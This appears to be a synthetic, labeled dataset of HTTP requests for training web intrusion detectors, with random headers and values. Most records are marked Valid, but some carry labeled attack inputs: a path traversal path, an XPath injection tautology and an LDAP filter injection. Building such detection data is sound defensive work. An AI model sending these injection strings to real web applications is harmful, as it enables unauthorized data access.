TE: deflate;q=0.2,trailers
User-Agent: snfIhua/8.7.3
UA-Disp: 8989,2984,8
UA-OS: Windows NT
Via: 1.3 144.89.138.158
Transfer-Encoding: compress
Upgrade: uitmh/9.8, klde/1.2
X-Serial-Number: 036132997114455
----: -----------------------

104knowioioa2t=l7ysgeiewcebsad&oltrsAdh=870657&awaeeyiyqf=hCVaTd68Ok&i11mbjrgeeenRtn=521984&eah0kWCs=etkdi>sl c&7mpF6i9sdqI=4854892&execctOBixRef=abRH&sotdchqs=lttIlHk&hq=0504226402&RHtmre=3&xbBlogO5Ce0=9

End - Id: 48286
Start - Id: 34594
class: Valid
POST /bxmJ85AeOIx/ptelnet57d-u.css? HTTP/1.0
Content-Length: 338
Content-Language: Ao,rvdvitmn,ii
Content-Encoding: identity
Content-Location: http://www.wbd2u.cz/aIMenai.php3
Content-MD5: OGFsYWFvb3NORWk1cmx0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Aug 07 01:17:47 GMT
Last-Modified: Wed, 25 Mar 09 11:39:07 UTC
Host: www.hseina.cz:929
Connection: close
Accept: audio/basic
Accept-Charset: iso-10646-ucs-2;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 7.105.70.126
Cookie: tiaidppnai=00630
Cookie2: $Version="063"
Date: Sun, 03 Oct 04 19:26:29 UTC
ETag: W/"LxEfvKTjP9LbiDf"
Expect: 100-continue
From: hAcasd@ertucieec.de
If-Modified-Since: Mon, 27 Jun 05 20:21:43 UTC
If-Unmodified-Since: Sun, 11 Apr 04 08:57:28 UTC
If-Match: "jYyG0Vw3ecOPnygZ_Fqu"
If-None-Match: *
If-Range: "9I_Yo_wY_uQ1ta_SE"
Max-Forwards: 712
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: NTLM Z25yYWhvMHJoRWZlVG9vZWFzZ0k4b2lBc2h0Ykxubmlu
Range: 1867-,-2727
Referer: /tenhi/snipld/elsmeTao/inMAhegi/igohsla.tiff
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/1.5 (compatible; brenh; Linux i586; ffrwe; ywdy)
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4185
Via: 5holu/6.9 77.165.28.161, 6.4 179.245.225.131
Transfer-Encoding: ler2s
Upgrade: aiiee/8.2, tosd/8.9
Warning: 945 www.eeodke.htm "hasrmstcsdtwtkpyg" "Tue, 18 Dec 07 06:07:29 UTC"
X-Forwarded-For: 24.202.233.40
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2rezehghed=j7sehtdhtnwPMkeoe&da=Pieytrnt&bte=35902&wiWerssa=ee6NefWpnyenxx&e9krHjnIm9syent=sxMqW@4&9ttj0fJoieK=2&SzWkTA9926m=ikahtasa6i6benu&ate9shazeAoeI=b/r&ads1elpt=1Seswaysrant &cks=466&iHunvtwoviheupd=teformnbdEt:&21ig~l&Aea25ieealaht2b=allinb&ier6wfd8e9hdNe=Mtgah8eCota&@-vURYetcs=vbscriptbeaaet5tFt&so1l1nooksoqe=71524555

End - Id: 34594
Start - Id: 13241
class: Valid
GET /mnerbGriat9ia1/ee40e22g3ieaehnmmy.msf? HTTP/1.1
Host: www.ioiTrxneD.ch
Connection: oyntc
Accept: video/*, application/*
Accept-Charset: iso-8859-8-i, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 203.87.162.48
Cookie: ha9aehjbs7=5jfrom;as2sudEe=rceddq2n6objectaennh
Cookie2: $Version="9"
Date: Tue, 01 Jul 08 18:31:47 GMT
ETag: W/"p@wbj5t.cf_e_@qWK"
Expect: i9hsauA
From: jNma@wOtd.fr
If-Modified-Since: Sun, 02 Oct 05 05:10:32 CET
If-Unmodified-Since: Sun, 02 Dec 07 10:00:27 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3009
MIME-Version: 6.3
Pragma: t=tr
Proxy-Authorization: Ooasqs dwno=ntjiba
Authorization: Digest realm
Range: 16-5
Referer: http://www.9iee1mue.de/ottone/vAtorba9/nioeh.aspx
TE: deflate,deflate
Trailer: Pragma
User-Agent: aHnilgo http://www.Veneeha0.gov
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: identity
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 198 157.148.141.227 "pngahiabduinT" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13241
Start - Id: 29851
class: Valid
GET /NdKLXCKI0f/o.yK6yycxq_eS/dx_.22FM1QnJExr/exl2see4mocsrhmr/rotr3wserndinfed/nTraisfl.html?ytddSjntdbmEyA=8&kn0odloynf=2854343 HTTP/1.1
Host: www.yoe9niSyrk.ch:80
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 156.80.149.37
Cookie: sTedtoMd4dawx=00;edefnlTy=% 5wbpasswdrddrm 50optsdrtse;yFpRtI1veAm3=8906211520;6za0hkWreoLhito=ue2% g0nF(e<sitwwp
Cookie2: $Version="3"
Date: Fri, 05 Jun 09 13:41:11 GMT
ETag: W/"Wb958tQQhaImEh@XAw"
Expect: 100-continue
From: hggtsom6@ieylr.uk
If-Modified-Since: Tue, 11 Sep 07 13:46:59 CET
If-Unmodified-Since: Thu, 04 Mar 10 04:36:32 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Sep 09 17:26:11 CET
Max-Forwards: 73
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: ooCrn uhdtoip=x2totge
Authorization: Basic eWhuZTp3dGF0
Range: -58988,5-,282881-
Referer: /naii/mjgt/0ogul/tcujto.jpg
TE: trailers,trailers
Trailer: Expect
User-Agent: aTotnath/5.1
UA-CPU: MIPS
UA-Disp: 724,467,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 952x914
Via: 5.8 www.idNNaew.js, naeo/4.0 www.rmbnttNp.jpg, 7.6 206.253.182.195
Transfer-Encoding: deflate
Upgrade: exm/3.9, rRT/2.7
Warning: 092 51.28.246.106:00061 "nleog" "Sat, 22 Dec 07 18:20:58 UTC"
X-Forwarded-For: 87.103.209.5
X-Serial-Number: 82258082988548
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29851
Start - Id: 22210
class: Valid
GET /hspremsylhrlt3t/tpu9lASL/g4HOEC95CP4Snfeva/O2Cfgroup byUMjs4Z/e9ascsidocmUeawad/nJwblURp4gk.k6q/rQ/ylkaxxs/6st/uoxTMvA9tvc/tmh/rbte827hjn.swf?oIwinntjrcpgroup byX=ob8COQ&Rlibm6a=tAjphesbd&eespieiiy6goc=4177562&qonsjtsn=e8&dgirrqni=88&boyoLae=huEAdaAbTnxnhnyte2&tea=txVV2&Klxadmin2=229&Ee=gQAgX&i4de81bedlvees=tin%28&eyTe=224908659&hetttedtdf=s911&vJZ0catR6vUWhtacces=swsbtuf HTTP/1.0
Host: www.Dnsl.de
Connection: close
Accept: video/mpeg;q=0.6, audio/x-wav, text/*;q=0.1
Accept-Charset: koi8-r, iso-2022-kr, iso-8859-9;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 65.73.209.151
Cookie: teeoHhotNotd=tAsa;eeJHmye1bsgv=iAi9wwCDN-h;Eulor=erpm<tAnph-rI;cjw=463;Xrh=dcldh
Cookie2: $Version="1"
Date: Wed, 29 Mar 06 23:31:30 GMT
ETag: "8lIP4UFX.Gq_zdTG"
Expect: 100-continue
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Sun, 15 Jun 08 11:45:20 UTC
If-Unmodified-Since: Sat, 27 Jun 09 21:31:39 GMT
If-Match: "UVl.G0aeTYEsYPOD6Xjw"
If-None-Match: "QK@vS5pEyaSj4p1"
If-Range: *
Max-Forwards: 6
MIME-Version: 6.8
Pragma: aoaoatej=ir
Proxy-Authorization: Basic bGNoYW46bzRPYUM=
Authorization: Basic aElycnJ0OmVydHU=
Range: -09
Referer: http://40izllni.it/tsSn6ilh/reo2/lbadg/ntsgnX/aang.txt
TE: trailers
Trailer: From
User-Agent: tGgpBV9Ko http://www.4oooh.com
UA-CPU: Sparc
UA-Disp: 425,349,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x8565
Via: HTTP/8.7 66.165.27.187:78, FTP/4.6 53.235.149.16
Transfer-Encoding: atIlo
Upgrade: tmok/9.0, unq6a/6.8, to6le/2.7
Warning: 471 www.ihhsmu.html:12 "iviIgox" 
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22210
Start - Id: 21233
class: Valid
GET /5ZIFN/aO/m60QD8vmzPJei/ia1bnmatd/nJ5C2y4jCgHxC/xDmMZd/9rlrjh.gif?tsg7Rnlrui=54885&Afsurdjt=%7Ewfobz9iec&dopen3.BapWylF=%28o6ete%241ohe%3Eg&jtictpctftslu=493085&lfunknrYtyhroen=100841218&mzMdFN4Eo5=replacekt&Eneco8B=sqnoteslafa&YGhCV1DJxastdin=usfs5ciufetcxj&vEMneeevmdyssMh=537&tr=35758&Epsfp5Ectece5Gl=5X3EXB&7tpner=gz7esat%29tmpG%25eai3vhtpassservicespd&ehhao7nc5=91491832 HTTP/1.0
Host: 72.34.8.158
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, iso-8859-6;q=0.1, koi8-r, iso-10646-ucs-2
Accept-Encoding: compress;q=0.5, identity, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 100.117.22.239
Cookie: CAbe=4T5nleensggz
Cookie2: $Version="6"
Date: Mon, 15 Dec 08 14:08:00 UTC
ETag: "Pn7wpUNRDgZuyN1"
Expect: 100-continue
From: glasam@Hqvmk25ns.cz
If-Modified-Since: Mon, 21 Apr 08 04:28:34 UTC
If-Unmodified-Since: Tue, 29 Jul 08 11:30:29 GMT
If-Match: *
If-None-Match: *
If-Range: "dr@pLbHUGLx8QJF"
Max-Forwards: 634
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZGxlbmhiTzp4ZXV1cnNz
Range: 514-56,34-,2775-22974
Referer: /jtdIT/aceatg1d/otiteunu.pdf
TE: gzip;q=0.0,chunked;q=0.1,chunked
Trailer: If-None-Match
User-Agent: rHeeeih (rxECuPa40Q)
UA-CPU: MIPS
UA-Disp: 664,7142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7822x0790
Via: 7.1 14.151.92.150, HTTP/0.0 www.tsa2.html
Transfer-Encoding: deflate
Upgrade: vlnrne/8.6, lQaa/8.0, ystnvI/3.6
Warning: 017 www.Etenf.jpg "ro10ulHtnehdnr" "Wed, 11 May 05 14:39:04 GMT"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 323295
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21233
Start - Id: 45257
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.ef4m.be:80
Connection: close
Accept: video/*, audio/basic, application/*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: min-fresh=44
Client-ip: 197.120.255.144
Cookie: ulEeDnnE=093;siuoer=309
Cookie2: $Version="34"
Date: Tue, 27 Jan 04 19:30:29 UTC
ETag: "aEx1_obfnEaMPvXi2"
Expect: 100-continue
From: tintef5@tbwhr.net
If-Modified-Since: Thu, 03 Feb 05 21:02:34 GMT
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: *
If-None-Match: "tREQ9CogO_GfU9jNQ"
If-Range: *
Max-Forwards: 86
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest qop=evai40
Authorization: i0dd qlhepevi=nmCnh
Range: -249,23568-43
Referer: /twab/ndTmwn/rverotl/uhuuoi.jpeg
TE: trailers
Trailer: Accept
User-Agent: onned7ssZh/1.3.7.3.3
UA-CPU: 68000
UA-Disp: 783,7858,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: deflate
Upgrade: b9r/9.4
Warning: 924 www.Tmlirlsa.shtml "t5eakntztrsthoinaeue" 
X-Forwarded-For: 95.222.138.243
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45257
Start - Id: 21879
class: Valid
GET /6VV-uv79c9N0Fm9/o-zivohG/rbscisyyimreoyrar8iy/mhaehai1eta27rn2ia/TsP6tneio/wgAoUVuy-null/Y4/ttewosYoero1z/Z9.css?fhtaccespconnect600=eserz&gEqdttnataeec3s=i5rth&AqsoTaesehwPUit=71979&footsssl2=mbo&d1diw7bhiiice=%7Eunion&boeusovagaxesde=eii%25a&fborntihrotevt=farhey&aAorKnd7e=Oat&exIckiy7lrejHq=yina&rUoq2oj5ehnsa=cand&ahalkn6=%5BRv&aaolov6gwOl=67859111&az=sea&dralgzbemnpsqh=o%3A4z%3D HTTP/1.1
Host: www.ihnftdfoeT.net
Connection: iIeu
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity, gzip, compress, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 124.23.154.34
Cookie: 50rLZAmeta90F=8520434;YGff8insertmetahtaccesxzj=4682
Cookie2: $Version="53"
Date: Sat, 24 Nov 07 01:21:37 UTC
ETag: "fyqs5Qx@yMaGeCdjwq"
Expect: ohTw2=3Sm4tlko;zoeayq
From: gspde@ia3eGzume.be
If-Modified-Since: Tue, 09 Sep 08 22:11:10 UTC
If-Unmodified-Since: Thu, 13 Jan 05 01:37:36 UTC
If-Match: *
If-None-Match: *
If-Range: "5Meqdj9eimp2KmKwN"
Max-Forwards: 4
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: NTLM b212ZnRzQ2lzbGlDNjJ6MGRvbmNybnlhdHNpSG9FaXlFZnlzZGFy
Range: -34244,001-
Referer: /atihon/ttaoaetn/sascrqu/ewatsn/9a6cniEa.asp
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 1.6; zg-2e; rv:0.8.3) Gecko/94825796
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5382x0739
Via: 9.3 www.igHcpt.png
Transfer-Encoding: compress
Upgrade: foarn/6.0
Warning: 810 48.19.38.105 "wocweaael2R4t" "Mon, 17 Nov 08 22:16:35 GMT"
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21879
Start - Id: 15667
class: Valid
GET /eepx1fttrgdEtx0tsep/iO_/lwL/tEsi8qhe06b3igactkje/Yzwp-bSkn./jruehU/hZ/udbNysj/G@G2/a22aj1O@/ree8rBbGo9ru4ituhah.js?eval29yfNT-Decho=sna+&W60ltoll=i&Wal=atc&2nyhtxeP=Ipls&zii38rintk4i=0xmld&3nengssCphz=r&yatvzecjtgsh=wsnliys%29varainput1eei HTTP/1.0
Host: 247.210.171.217:3
Connection: zutcM
Accept: application/x-tar, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 197.42.196.77
Cookie: efl2e5es=mmnXLX_f
Cookie2: $Version="2"
Date: Thu, 14 Dec 06 13:07:20 CET
ETag: "v3uY87R99jdWOL@hk@1"
Expect: vir4dq=i1xatt;extc
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Wed, 31 Mar 04 11:45:55 CET
If-Unmodified-Since: Thu, 05 Mar 09 11:10:46 UTC
If-Match: "34euGWVJaZftAsd"
If-None-Match: *
If-Range: Tue, 08 Dec 09 11:08:48 GMT
Max-Forwards: 5951
MIME-Version: 3.2
Pragma: esxt=be
Proxy-Authorization: teor nreet8r=iOewe
Authorization: NTLM cnJocHBmb25wYWluNGxpc2JwanNzbnBlYWFmdG5TT3RvaDNqZXM=
Range: -999103
Referer: http://ovtt.fr/giDcua/qrnlaErU/dah8nl.asp
TE: gzip,trailers,gzip
Trailer: From
User-Agent: OdduutOy0/7.7.2
UA-CPU: PowerPC
UA-Disp: 9331,266,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2296x8201
Via: 0.6 www.ial74in.jpg, 9.9 www.eetlels.htm
Transfer-Encoding: identity
Upgrade: nIttOn/7.6, s3nl/3.5, 90l/3.3, yneaI/5.5
Warning: 358 www.IqahRx.css "teexfzsw" 
X-Forwarded-For: 190.33.72.247
X-Serial-Number: 35129354976
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15667
Start - Id: 20189
class: Valid
GET /t6XMw/QK@bOOui/tZi2rVkCR0wbW0y-O.gif?rjho7=280018&3deItt=s0wtiIfx9&uhB=%25q&ei65ehe5hdtrpD=odohjrAn%29rfIl&_tHyu=91519202&tncodlbsf7=oxKF1MInt&IttCslbt2soTx=76&pxihrgrhewn=lndhcNcWO0elhzp&uersouqtlfA=tdhhc+dmb%5CS+%40onge%27j&iv4RDuiotnge=yaes2eaaaehS&wRGmeta0Diimgl=aExieoHs5pyae28&o4Seenllpaxgths=16451&d5aoG4rrzreIyb=he+ofncy&0Ct9eoHaa=mb7ni&seTe=adTnC HTTP/1.1
Host: www.eNsrsrb.org
Connection: hpbft
Accept: image/jpeg;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 155.53.224.185
Cookie: h5o=clechos+wun66linkeeh
Cookie2: $Version="6"
Date: Sun, 02 May 10 02:18:57 GMT
ETag: "mW3d3fD.0iRmDDxujBi"
Expect: 25de
From: bgcY@aessp.com
If-Modified-Since: Sun, 09 Sep 07 18:36:35 UTC
If-Unmodified-Since: Tue, 30 Jun 09 16:08:35 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 525
MIME-Version: 7.1
Pragma: pamerrn='epib'
Proxy-Authorization: Basic bG1kbzpUdzJw
Authorization: Basic aGhzdHo6aWFwMHBvdg==
Range: 365749-,607-065
Referer: /wcem/twah/jsyn/eseahdi.asp
TE: trailers
Trailer: Range
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 3.1; s4-go; rv:5.4.0) Gecko/26607024
UA-CPU: StrongARM
UA-Disp: 909,081,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4940x047
Via: mva/8.1 65.144.28.241, 4.3 130.217.17.134
Transfer-Encoding: gzip
Upgrade: lsath/8.3
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 19435984219
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20189
Start - Id: 49882
class: XPathInjection
GET /bdlmiR/ugrlsWoeGtpn/7Q/sZ56HYMQJ/hryjnAyeye/aeohusahRaineMMi1dye/UdDs5kDi7.o/t1vuMB74JYgV-/ttey/uuWN@hAaexuOUv.htm?Qa8czv=3&ossok0ntnte3euG=11&e4oe0a=90852&anetgmpme=5angzt%3Bpnm&Lt1=ovFOJvMVv8&1ea=totolcl%27+++or++++1%3C+++++egwja%2Ft%2FNl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D927%5D+or+%27n1hdu%27+++%3D+%27&bTn=o7sd&3B=1696&9I39=7209163&xt=286873612 HTTP/1.1
Host: www.gola.fr:80
Connection: close
Accept: video/mpeg;q=0.1, text/*, application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.2, compress
Accept-Language: uyut-nt9xuts, fyOv0-Ra;q=0.5, yaoeeedt-veDw
Cache-Control: only-if-cached
Client-ip: 161.161.216.27
Cookie: tM78acsao=1635963;gowmtenwiiit8T=nZ2PT0;ida4r9av=olibha6otcri2t6a;uCorsm-FbinQJ=reRttth6h;rsoirenQIwaq2nu=elzoa
Cookie2: $Version="5"
Date: Wed, 02 Aug 06 13:48:34 GMT
ETag: W/"79-wqobJXvLTgCDO1"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sun, 24 Jan 10 22:11:14 CET
If-Unmodified-Since: Wed, 06 Dec 06 06:29:44 UTC
If-Match: *
If-None-Match: "7tPRCTwO4zYPaaKm"
If-Range: Sun, 06 Aug 06 02:37:20 CET
Max-Forwards: 3
MIME-Version: 6.4
Pragma: iiwtSd='a7cbuQrj'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: /krfe/7rnra/doomw/qbutre0.php
TE: trailers,trailers,deflate;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/3.8 (Machintosh; U; Mac OS X 2.9; se-ll; rv:5.9.4) Gecko/41720713
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 005x724
Via: HTTP/1.6 137.106.141.159:699
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49882
Start - Id: 2742
class: Valid
GET /XpJIVRVENZ8tTzc/m78tqe8iN5Aie8leaog.html?i6ch=226&abeejoB=%2FT1q&msElL1aumZEicdn=abti&oT35AfitEego=sc+ob&esstu2ue2acl=ib9y4B2Wz&Z3BfvF8@=euh4iwytrzCaA5&nuOa=peeynrttvzA46do&ns=rmbn01wnodbsvor+aom&np=hae%7Eke%3CCa+0&efKaRrElei7=etereplace%25E+nimgNboot.inilm HTTP/1.0
Host: 126.155.228.10:2
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.0
Accept-Language: *
Cache-Control: btnyod='eqg'
Client-ip: 133.135.129.178
Cookie: RrOast=yrE
Cookie2: $Version="32"
Date: Tue, 08 Dec 09 24:25:34 GMT
ETag: "5QDGS.NV9zzymwcyb"
Expect: u70trk
From: dasa@Cnth.cz
If-Modified-Since: Fri, 05 Mar 04 17:54:45 CET
If-Unmodified-Since: Sun, 18 Nov 07 12:44:16 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Sep 08 23:23:41 UTC
Max-Forwards: 777
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic NWxtbmVhdW06NmlhZXll
Authorization: Basic cGV3eTplc3Njc2Vp
Range: 8-,-0,6-
Referer: /m5e9Si3a/kmoeepy/uetls4/tddS/opwbio.mpeg
TE: trailers
Trailer: Warning
User-Agent: dAQL.lP9x http://www.a6sla.it
UA-CPU: PowerPC
UA-Disp: 599,0261,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 738x004
Via: FTP/3.1 www.nthbe.html, 1.4 www.7o7coewd.jpg:9, HTTP/9.7 www.ebseOohO.png
Transfer-Encoding: gzip
Upgrade: ltniik/7.5, 1Ntcmo/9.7
Warning: 048 www.yigv.gif "cdtfsiao" "Mon, 13 Oct 08 01:16:56 UTC"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2742
Start - Id: 38220
class: LdapInjection
GET /eF8wLBQ_Eq/wel1j/ou1uu1aOxsi/VCqtrmcopyzg6AXqRw/enqdbahescnTwdymo/e-p7U89qRpB-q2Ujt/otpohx/oeZ6vnszcTsV8l@zDHf/iYV.f/eO_qBrOUNR/aPC1..asp?gsesaeygam=241&ht=6670044&3erTTXsw3dqiew7=lvudaWtwAoate%26I&inretd=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&nm=7589534&-eexecTlr=2852 HTTP/1.0
Host: www.1euinsuK.org:6
Connection: keep-alive
Accept: text/*;q=0.6, video/*
Accept-Charset: iso-8859-8-i;q=0.4, windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=9583
Client-ip: 63.225.80.253
Cookie: 3laeeoeSqdu=ensstditarbtehr-o;ioooirpywfc6i6r=83749;shtmsc4hfeiikCe= haoes;sr=winntn;htaccesCQn1= 4;dAatHpimiund=550
Cookie2: $Version="7"
Date: Thu, 07 Sep 06 18:23:26 UTC
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Tue, 30 Dec 08 23:59:02 GMT
If-Unmodified-Since: Fri, 10 Jul 09 01:52:13 UTC
If-Match: *
If-None-Match: "CY-_ds65mePOcEr"
If-Range: Fri, 20 Apr 07 13:33:25 UTC
Max-Forwards: 4667
MIME-Version: 3.2
Pragma: evt='g'
Proxy-Authorization: lN7eh8 3eeeTvs=rP8rhi
Authorization: Basic ZXQxbmM6QzBvZXNBZ0U=
Range: 491-,605-2708,157323-67914
Referer: /knhqna20/nIhc1ute.aspx
TE: chunked;q=0.3,trailers,deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/6.2 (Windows; U; Win98 6.7; LU-iV; rv:9.4.5) Gecko/38654784
UA-CPU: Sparc
UA-Disp: 912,7281,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 321x2267
Via: HTTP/0.2 www.Srnuryo6.html, 7.3 www.rnHlhat.gif, HTTP/7.4 www.scrt.css
Transfer-Encoding: cam4se
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38220
Start - Id: 11300
class: Valid
GET /Qz4childL0Gincluderwp-Yc4/n41.w5Lx6L4C2V8/aR63LnE.J__35pdOKd/foeaeo6rdi9nlvdtu/eaPn/9mochawZ5wq/b-jNniQ/5eQFEy5DTRXS1-VNtp@P/0IIht6Ouans/9aijnt6tosfrskyorer.bin?NEAc=sue HTTP/1.1
Host: 183.104.65.0:80
Connection: gshyOot
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ifuT-th0u93ia, 3-4ut;q=0.0, 3nasg-eRhecI6a, mwotre-wm53se
Cache-Control: no-store
Client-ip: 68.0.49.221
Cookie: ecollesaiI=032703654
Cookie2: $Version="547"
Date: Wed, 29 Oct 08 17:16:31 CET
ETag: W/"Q70-SUILFtkAP0xZBTKb"
Expect: gCSEste
From: ttdeuerp@Beemcrefe.st
If-Modified-Since: Sat, 17 Apr 10 24:03:58 UTC
If-Unmodified-Since: Mon, 17 Sep 07 12:18:25 CET
If-Match: "P.TTvoHv_RaMZ0HbG"
If-None-Match: "CjI3W4.UhtZLbnXOfL"
If-Range: *
Max-Forwards: 410
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic MGt5bGk6d2h0c0N1aWI=
Authorization: NTLM ZG90a2dzdTNQZGV0b3Jkd3JpZWllOHN0a2RvaHREM2V0c1E=
Range: 752021-,5-316,-931642
Referer: /eUrS8d1/vaejv/4meahH.php3
TE: trailers,trailers
Trailer: From
User-Agent: bRtUlAom
UA-CPU: StrongARM
UA-Disp: 144,3420,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2840x080
Via: FTP/4.3 www.mlIh.jpg:7488
Transfer-Encoding: compress
Upgrade: iaan/9.5, nEc8/6.5, dtieO/7.0, is5/4.9
Warning: 175 www.nAlNiR.png "m3SZt1ats4" 
X-Forwarded-For: 203.140.233.72
X-Serial-Number: 7492268797432274
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11300
Start - Id: 8842
class: Valid
GET /Keiea/hAr5Eeio/lP@tuzTr.5n6IynmWU/iE63kqrBQ3zBOD/GIphpallHuJfjn-W.tiff?W3Tde7y=yW_wg&thcrteT4e=len%2Ba&ueNezhCcrwac=9m%7Cf2%24r%7Ewnn&oaeE1eehfee=8987803071&omu4suhxptg5ed=528&mIurn=cbnullSsohlinets&idg=Jrae6Eolap5almwan&zpYsy35tmpdocumentp=%27 HTTP/1.0
Host: 98.21.12.94
Connection: zlnhh
Accept: text/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: 7O0syhke-im, vTa-8, tsitrtw-rpv0efa
Cache-Control: no-cache
Client-ip: 172.255.16.6
